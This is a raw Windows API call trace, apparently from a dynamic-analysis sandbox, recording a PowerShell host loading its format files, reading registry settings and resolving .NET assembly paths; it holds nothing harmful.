	[0430.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.230] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.230] CoTaskMemAlloc (cb=0x104) returned 0x1b9a9480
	[0430.230] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b9a9480, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0430.230] CoTaskMemFree (pv=0x1b9a9480) 
	[0430.230] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.230] SetErrorMode (uMode=0x1) returned 0x1
	[0430.230] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0430.230] GetFileType (hFile=0x1c8) returned 0x1
	[0430.230] SetErrorMode (uMode=0x1) returned 0x1
	[0430.231] GetFileType (hFile=0x1c8) returned 0x1
	[0430.231] ReadFile (in: hFile=0x1c8, lpBuffer=0x34d2908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34d2908*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.232] ReadFile (in: hFile=0x1c8, lpBuffer=0x34d2908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34d2908*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.232] ReadFile (in: hFile=0x1c8, lpBuffer=0x34d2908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34d2908*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.232] ReadFile (in: hFile=0x1c8, lpBuffer=0x34d2908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34d2908*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.232] ReadFile (in: hFile=0x1c8, lpBuffer=0x34d2908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34d2908*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.233] ReadFile (in: hFile=0x1c8, lpBuffer=0x34d2908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34d2908*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.233] ReadFile (in: hFile=0x1c8, lpBuffer=0x34d2908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34d2908*, lpNumberOfBytesRead=0x26cff8*=0x9e2, lpOverlapped=0x0) returned 1
	[0430.233] ReadFile (in: hFile=0x1c8, lpBuffer=0x34d1e52, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34d1e52*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.233] ReadFile (in: hFile=0x1c8, lpBuffer=0x34d2908, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34d2908*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.233] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.233] SetErrorMode (uMode=0x1) returned 0x1
	[0430.233] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfa0 | out: lpFileInformation=0x26cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0430.233] SetErrorMode (uMode=0x1) returned 0x1
	[0430.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.234] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x1c8) returned 0x0
	[0430.234] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d00c, lpData=0x0, lpcbData=0x26d008*=0x0 | out: lpType=0x26d00c*=0x1, lpData=0x0, lpcbData=0x26d008*=0x56) returned 0x0
	[0430.234] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2940
	[0430.234] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cfdc, lpData=0x1b9a2940, lpcbData=0x26cfd8*=0x56 | out: lpType=0x26cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26cfd8*=0x56) returned 0x0
	[0430.234] CoTaskMemFree (pv=0x1b9a2940) 
	[0430.234] RegCloseKey (hKey=0x1c8) returned 0x0
	[0430.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.234] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.235] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x67ca65d0, Data2=0x8b65, Data3=0x41d2, Data4=([0]=0xb6, [1]=0x5, [2]=0x64, [3]=0x72, [4]=0x88, [5]=0x5e, [6]=0x57, [7]=0x97))) returned 0x0
	[0430.236] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x3604650e, Data2=0x1007, Data3=0x4e85, Data4=([0]=0x9e, [1]=0x7b, [2]=0x62, [3]=0x2, [4]=0x25, [5]=0x9f, [6]=0xeb, [7]=0x8c))) returned 0x0
	[0430.237] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.237] SetErrorMode (uMode=0x1) returned 0x1
	[0430.237] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0430.238] GetFileType (hFile=0x1c8) returned 0x1
	[0430.238] SetErrorMode (uMode=0x1) returned 0x1
	[0430.238] GetFileType (hFile=0x1c8) returned 0x1
	[0430.238] ReadFile (in: hFile=0x1c8, lpBuffer=0x34fd470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34fd470*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.239] ReadFile (in: hFile=0x1c8, lpBuffer=0x34fd470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34fd470*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.239] ReadFile (in: hFile=0x1c8, lpBuffer=0x34fd470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34fd470*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.239] ReadFile (in: hFile=0x1c8, lpBuffer=0x34fd470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34fd470*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.240] ReadFile (in: hFile=0x1c8, lpBuffer=0x34fd470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34fd470*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.240] ReadFile (in: hFile=0x1c8, lpBuffer=0x34fd470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34fd470*, lpNumberOfBytesRead=0x26cff8*=0xfb2, lpOverlapped=0x0) returned 1
	[0430.240] ReadFile (in: hFile=0x1c8, lpBuffer=0x34fcb8a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34fcb8a*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.240] ReadFile (in: hFile=0x1c8, lpBuffer=0x34fd470, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x34fd470*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.240] SetErrorMode (uMode=0x1) returned 0x1
	[0430.240] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfa0 | out: lpFileInformation=0x26cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0430.240] SetErrorMode (uMode=0x1) returned 0x1
	[0430.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.241] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x1c8) returned 0x0
	[0430.241] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d00c, lpData=0x0, lpcbData=0x26d008*=0x0 | out: lpType=0x26d00c*=0x1, lpData=0x0, lpcbData=0x26d008*=0x56) returned 0x0
	[0430.241] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2940
	[0430.241] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cfdc, lpData=0x1b9a2940, lpcbData=0x26cfd8*=0x56 | out: lpType=0x26cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26cfd8*=0x56) returned 0x0
	[0430.241] CoTaskMemFree (pv=0x1b9a2940) 
	[0430.241] RegCloseKey (hKey=0x1c8) returned 0x0
	[0430.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.241] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0430.242] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xff71d4a2, Data2=0xd6ff, Data3=0x45ab, Data4=([0]=0x99, [1]=0x35, [2]=0xe8, [3]=0x86, [4]=0xf5, [5]=0x3e, [6]=0xfe, [7]=0xa9))) returned 0x0
	[0430.242] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0x36de389d, Data2=0x33dc, Data3=0x4bee, Data4=([0]=0x85, [1]=0xa5, [2]=0x65, [3]=0x17, [4]=0xb4, [5]=0xa8, [6]=0x4, [7]=0x3))) returned 0x0
	[0430.242] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xba9feb87, Data2=0x988b, Data3=0x4dd6, Data4=([0]=0x95, [1]=0x75, [2]=0x9b, [3]=0x90, [4]=0x28, [5]=0xe8, [6]=0xa7, [7]=0xf4))) returned 0x0
	[0430.242] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xda77537f, Data2=0xd6fc, Data3=0x482b, Data4=([0]=0xae, [1]=0xf3, [2]=0xed, [3]=0x7, [4]=0x2b, [5]=0xc9, [6]=0xec, [7]=0x83))) returned 0x0
	[0430.243] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xb1049852, Data2=0xe601, Data3=0x486d, Data4=([0]=0xbc, [1]=0xaf, [2]=0x3c, [3]=0x94, [4]=0x14, [5]=0x6c, [6]=0x13, [7]=0xb7))) returned 0x0
	[0430.243] CoCreateGuid (in: pguid=0x26d2b0 | out: pguid=0x26d2b0*(Data1=0xe6e6b83b, Data2=0x8dc6, Data3=0x493b, Data4=([0]=0xa6, [1]=0x9, [2]=0x48, [3]=0x86, [4]=0xe2, [5]=0x43, [6]=0x1c, [7]=0x28))) returned 0x0
	[0430.243] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.243] SetErrorMode (uMode=0x1) returned 0x1
	[0430.243] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x1c8
	[0430.243] GetFileType (hFile=0x1c8) returned 0x1
	[0430.243] SetErrorMode (uMode=0x1) returned 0x1
	[0430.243] GetFileType (hFile=0x1c8) returned 0x1
	[0430.243] ReadFile (in: hFile=0x1c8, lpBuffer=0x35491d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35491d0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.244] ReadFile (in: hFile=0x1c8, lpBuffer=0x35491d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35491d0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.245] ReadFile (in: hFile=0x1c8, lpBuffer=0x35491d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35491d0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.245] ReadFile (in: hFile=0x1c8, lpBuffer=0x35491d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35491d0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.245] ReadFile (in: hFile=0x1c8, lpBuffer=0x35491d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35491d0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.246] ReadFile (in: hFile=0x1c8, lpBuffer=0x35491d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35491d0*, lpNumberOfBytesRead=0x26cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0430.246] ReadFile (in: hFile=0x1c8, lpBuffer=0x35491d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35491d0*, lpNumberOfBytesRead=0x26cff8*=0xaca, lpOverlapped=0x0) returned 1
	[0430.246] ReadFile (in: hFile=0x1c8, lpBuffer=0x3548802, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x3548802*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.246] ReadFile (in: hFile=0x1c8, lpBuffer=0x35491d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26cff8, lpOverlapped=0x0 | out: lpBuffer=0x35491d0*, lpNumberOfBytesRead=0x26cff8*=0x0, lpOverlapped=0x0) returned 1
	[0430.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.246] SetErrorMode (uMode=0x1) returned 0x1
	[0430.246] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26cfa0 | out: lpFileInformation=0x26cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0430.246] SetErrorMode (uMode=0x1) returned 0x1
	[0430.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.247] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d088 | out: phkResult=0x26d088*=0x1c8) returned 0x0
	[0430.247] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d00c, lpData=0x0, lpcbData=0x26d008*=0x0 | out: lpType=0x26d00c*=0x1, lpData=0x0, lpcbData=0x26d008*=0x56) returned 0x0
	[0430.247] CoTaskMemAlloc (cb=0x5a) returned 0x1b9a2940
	[0430.247] RegQueryValueExW (in: hKey=0x1c8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cfdc, lpData=0x1b9a2940, lpcbData=0x26cfd8*=0x56 | out: lpType=0x26cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26cfd8*=0x56) returned 0x0
	[0430.247] CoTaskMemFree (pv=0x1b9a2940) 
	[0430.247] RegCloseKey (hKey=0x1c8) returned 0x0
	[0430.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0430.248] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0430.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0430.250] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0430.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0430.251] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0430.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0430.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0430.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0430.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0430.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0430.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0430.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0430.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x26c510, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
